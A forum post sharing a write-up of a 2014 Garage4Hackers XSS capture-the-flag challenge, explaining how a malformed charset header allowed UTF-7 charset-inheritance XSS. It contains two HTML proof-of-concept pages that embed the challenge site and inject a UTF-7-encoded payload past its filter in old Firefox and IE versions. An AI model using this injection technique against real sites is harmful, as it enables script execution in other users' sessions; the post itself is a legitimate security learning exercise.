Results 1 to 1 of 1

Thread: Garage4Hackers Nov XSS CTF 2014 Write-up Share/Save - My123World.Com!

  1. #1
    Webapp Secninja
    Join Date
    Aug 2012
    Location
    Ranchi, Jharkhand
    Posts
    41
    Blog Entries
    2

    Garage4Hackers Nov XSS CTF 2014 Write-up

    Hey!


    Just wanted to write a small post on the G4H XSS Challenge CTF for November. My solution was for older browsers (as I didn't manage to solve it for latest ones).

    Here's my solution:


    PHP Code:
    <html>
      <
    head>
        <
    meta http-equiv="content-type" content="text/html;charset=utf-7">
      </
    head>
      <
    body>
    <
    center>  <h3>Run it in Firefox <= 3.6.6</h3></center>
      <
    object type="text/html; charset=UTF-7" data=http://198.50.254.202/?woot="%2bACIAPgA8-img%20src%2bAD0-x%20onerror%2bAD0AIg-alert%28document.domain%29%2bACIAPg" width=100% height=100%></object>
       
    </body>
    </
    html
    If anyone noticed or not, the CTF website had a malformed charset header field, that means it is/was readily vulnerable to charset inheritance XSS attacks.

    The above code exploits a known bug in Firefox <= 3.6.6 that we use to embed the whole web page in UTF-7 charset. While embedding the page we can load the XSS payload through GET (?woot=<XSS>). UTF-7 payload is undetected by the XSS filter and we execute an XSS attack on the challenge page's origin.


    Similar results can be accomplished for IE 6/7 (although I firmly believe this can be possible on IE8 as well using this bug:

    PHP Code:
    <html>
      <
    head>
        <
    meta http-equiv="content-type" content="text/html;charset=utf-7">
      </
    head>
      <
    body>

        <
    iframe width=500 height=600 src="http://198.50.254.202/?woot=xss-payload-in-utf-7"></iframe>
      </
    body>
    </
    html

    Result:




    Thanks for reading, feedbacks and views are welcome
    Last edited by prakhar; 12-01-2014 at 12:49 PM.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •